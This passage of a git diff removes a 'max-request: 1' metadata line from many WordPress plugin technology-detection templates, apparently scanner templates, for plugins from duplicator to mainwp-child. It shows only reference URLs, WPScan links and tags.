e224283ecd..ec119e762a 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duplicator/ metadata: - max-request: 1 plugin_namespace: duplicator wpscan: https://wpscan.com/plugin/duplicator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 9af8df08a7..b7ec7576a3 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/duracelltomi-google-tag-manager/ metadata: - max-request: 1 plugin_namespace: duracelltomi-google-tag-manager wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml index d4081474c3..c42d679973 100644 --- a/http/technologies/wordpress/plugins/easy-fancybox.yaml +++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/easy-fancybox/ metadata: - max-request: 1 plugin_namespace: easy-fancybox wpscan: https://wpscan.com/plugin/easy-fancybox tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index bcbc0707fb..fc44375947 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/easy-table-of-contents/ metadata: - max-request: 1 plugin_namespace: easy-table-of-contents wpscan: https://wpscan.com/plugin/easy-table-of-contents tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index 8b23832297..a1616c1741 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/easy-wp-smtp/ metadata: - max-request: 1 plugin_namespace: easy-wp-smtp wpscan: https://wpscan.com/plugin/easy-wp-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index f0c3e4bc63..6cfb8bc272 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/elementor/ metadata: - max-request: 1 plugin_namespace: elementor wpscan: https://wpscan.com/plugin/elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index eab4a0d725..9caaa53263 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/elementskit-lite/ metadata: - max-request: 1 plugin_namespace: elementskit-lite wpscan: https://wpscan.com/plugin/elementskit-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 74c172ac94..5e6b557952 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/enable-media-replace/ metadata: - max-request: 1 plugin_namespace: enable-media-replace wpscan: https://wpscan.com/plugin/enable-media-replace tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index f5a63a2ed2..c5a665e6f7 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/envato-elements/ metadata: - max-request: 1 plugin_namespace: envato-elements wpscan: https://wpscan.com/plugin/envato-elements tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 25ca7328ef..a8b56b5df0 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/essential-addons-for-elementor-lite/ metadata: - max-request: 1 plugin_namespace: essential-addons-for-elementor-lite wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index cb1db5bee6..4e20e57107 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ewww-image-optimizer/ metadata: - max-request: 1 plugin_namespace: ewww-image-optimizer wpscan: https://wpscan.com/plugin/ewww-image-optimizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index a3207ea16a..6f6a416595 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/facebook-for-woocommerce/ metadata: - max-request: 1 plugin_namespace: facebook-for-woocommerce wpscan: https://wpscan.com/plugin/facebook-for-woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2a4b772078..2dd0ef57b5 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/fast-indexing-api/ metadata: - max-request: 1 plugin_namespace: fast-indexing-api wpscan: https://wpscan.com/plugin/fast-indexing-api tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 366205085d..11942f4fa4 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/favicon-by-realfavicongenerator/ metadata: - max-request: 1 plugin_namespace: favicon-by-realfavicongenerator wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 598f08ce88..87c2aeb4bd 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/flamingo/ metadata: - max-request: 1 plugin_namespace: flamingo wpscan: https://wpscan.com/plugin/flamingo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 42cdfb4475..3696eefbf7 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/fluentform/ metadata: - max-request: 1 plugin_namespace: fluentform wpscan: https://wpscan.com/plugin/fluentform tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index a1af263dbd..8bab0a9c3e 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/font-awesome/ metadata: - max-request: 1 plugin_namespace: font-awesome wpscan: https://wpscan.com/plugin/font-awesome tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index 19265f910e..affd270123 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/force-regenerate-thumbnails/ metadata: - max-request: 1 plugin_namespace: force-regenerate-thumbnails wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index c21d414695..1e6a62e23b 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/formidable/ metadata: - max-request: 1 plugin_namespace: formidable wpscan: https://wpscan.com/plugin/formidable tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 91c89d0ad8..980265f531 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/forminator/ metadata: - max-request: 1 plugin_namespace: forminator wpscan: https://wpscan.com/plugin/forminator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index 539d9f7cec..daf205789d 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ga-google-analytics/ metadata: - max-request: 1 plugin_namespace: ga-google-analytics wpscan: https://wpscan.com/plugin/ga-google-analytics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index f4123bb594..22bfa3ffe2 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/gdpr-cookie-compliance/ metadata: - max-request: 1 plugin_namespace: gdpr-cookie-compliance wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 254f916291..7ed171d662 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/ metadata: - max-request: 1 plugin_namespace: google-analytics-dashboard-for-wp wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 8074ac337e..ad238445fc 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-analytics-for-wordpress/ metadata: - max-request: 1 plugin_namespace: google-analytics-for-wordpress wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index b9de0ee313..7161671960 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-listings-and-ads/ metadata: - max-request: 1 plugin_namespace: google-listings-and-ads wpscan: https://wpscan.com/plugin/google-listings-and-ads tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 7b0f188ff7..2678f603c6 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-site-kit/ metadata: - max-request: 1 plugin_namespace: google-site-kit wpscan: https://wpscan.com/plugin/google-site-kit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 898e4de56d..20d947a5d1 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-sitemap-generator/ metadata: - max-request: 1 plugin_namespace: google-sitemap-generator wpscan: https://wpscan.com/plugin/google-sitemap-generator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 4a76856a69..22ee97b51f 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/gtranslate/ metadata: - max-request: 1 plugin_namespace: gtranslate wpscan: https://wpscan.com/plugin/gtranslate tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index b321ca63eb..3f4c6c8936 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/gutenberg/ metadata: - max-request: 1 plugin_namespace: gutenberg wpscan: https://wpscan.com/plugin/gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 2b42c9f80c..fa1bb64115 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/happy-elementor-addons/ metadata: - max-request: 1 plugin_namespace: happy-elementor-addons wpscan: https://wpscan.com/plugin/happy-elementor-addons tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index dbea07a6da..da63d1cbf6 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-footer-code-manager/ metadata: - max-request: 1 plugin_namespace: header-footer-code-manager wpscan: https://wpscan.com/plugin/header-footer-code-manager tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 17a8f220cf..f94e7f6494 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-footer-elementor/ metadata: - max-request: 1 plugin_namespace: header-footer-elementor wpscan: https://wpscan.com/plugin/header-footer-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 956a08b32d..95d2aa5f16 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-footer/ metadata: - max-request: 1 plugin_namespace: header-footer wpscan: https://wpscan.com/plugin/header-footer tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 5a570b9077..af8193b875 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/health-check/ metadata: - max-request: 1 plugin_namespace: health-check wpscan: https://wpscan.com/plugin/health-check tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 4ecac0cd92..8d7e45818b 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/hello-dolly/ metadata: - max-request: 1 plugin_namespace: hello-dolly wpscan: https://wpscan.com/plugin/hello-dolly tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index e50f58cef8..ed3967db7b 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/host-webfonts-local/ metadata: - max-request: 1 plugin_namespace: host-webfonts-local wpscan: https://wpscan.com/plugin/host-webfonts-local tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 031bb48563..2ff5adba86 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/imagify/ metadata: - max-request: 1 plugin_namespace: imagify wpscan: https://wpscan.com/plugin/imagify tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 3cdcf3da93..9099f3c0a5 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/imsanity/ metadata: - max-request: 1 plugin_namespace: imsanity wpscan: https://wpscan.com/plugin/imsanity tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index c222bc9d4a..1ee0e67542 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/insert-headers-and-footers/ metadata: - max-request: 1 plugin_namespace: insert-headers-and-footers wpscan: https://wpscan.com/plugin/insert-headers-and-footers tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index c8acf8c625..43cb2ab09c 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/instagram-feed/ metadata: - max-request: 1 plugin_namespace: instagram-feed wpscan: https://wpscan.com/plugin/instagram-feed tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 66b7d6a363..7ba81036cf 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/intuitive-custom-post-order/ metadata: - max-request: 1 plugin_namespace: intuitive-custom-post-order wpscan: https://wpscan.com/plugin/intuitive-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml index a36016562d..24fc3e3295 100644 --- a/http/technologies/wordpress/plugins/iwp-client.yaml +++ b/http/technologies/wordpress/plugins/iwp-client.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/iwp-client/ metadata: - max-request: 1 plugin_namespace: iwp-client wpscan: https://wpscan.com/plugin/iwp-client tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index 8033aacbc6..3e89505574 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/jetpack-boost/ metadata: - max-request: 1 plugin_namespace: jetpack-boost wpscan: https://wpscan.com/plugin/jetpack-boost tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index e4017b1a0a..e701e365ba 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/jetpack/ metadata: - max-request: 1 plugin_namespace: jetpack wpscan: https://wpscan.com/plugin/jetpack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 53d6d393bd..c0cc5400a8 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/kadence-blocks/ metadata: - max-request: 1 plugin_namespace: kadence-blocks wpscan: https://wpscan.com/plugin/kadence-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index c286e9a14f..22687bcffe 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/kirki/ metadata: - max-request: 1 plugin_namespace: kirki wpscan: https://wpscan.com/plugin/kirki tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 364e3cd71e..b69d3d5bfe 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/leadin/ metadata: - max-request: 1 plugin_namespace: leadin wpscan: https://wpscan.com/plugin/leadin tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 4fcccbfc33..7975a57702 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts-reloaded/ metadata: - max-request: 1 plugin_namespace: limit-login-attempts-reloaded wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 3fbc714d3b..ff4cef94d7 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts/ metadata: - max-request: 1 plugin_namespace: limit-login-attempts wpscan: https://wpscan.com/plugin/limit-login-attempts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index c49b506979..a8903697b0 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/litespeed-cache/ metadata: - max-request: 1 plugin_namespace: litespeed-cache wpscan: https://wpscan.com/plugin/litespeed-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index dfcaf6f71b..3f141c4476 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/loco-translate/ metadata: - max-request: 1 plugin_namespace: loco-translate wpscan: https://wpscan.com/plugin/loco-translate tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 61be246fee..5355e988a2 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/loginizer/ metadata: - max-request: 1 plugin_namespace: loginizer wpscan: https://wpscan.com/plugin/loginizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginpress.yaml b/http/technologies/wordpress/plugins/loginpress.yaml index 1c16a72d76..6f06b49011 100644 --- a/http/technologies/wordpress/plugins/loginpress.yaml +++ b/http/technologies/wordpress/plugins/loginpress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/loginpress/ metadata: - max-request: 1 plugin_namespace: loginpress wpscan: https://wpscan.com/plugin/loginpress tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 50d2e6630b..53d409fb68 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-woocommerce/ metadata: - max-request: 1 plugin_namespace: mailchimp-for-woocommerce wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 8d71f7bde9..0e908a9580 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-wp/ metadata: - max-request: 1 plugin_namespace: mailchimp-for-wp wpscan: https://wpscan.com/plugin/mailchimp-for-wp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index 5e1f97086e..aeb1875c57 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mailpoet/ metadata: - max-request: 1 plugin_namespace: mailpoet wpscan: https://wpscan.com/plugin/mailpoet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index d87d456a8c..7c15702305 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/maintenance/ metadata: - max-request: 1 plugin_namespace: maintenance wpscan: https://wpscan.com/plugin/maintenance tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml 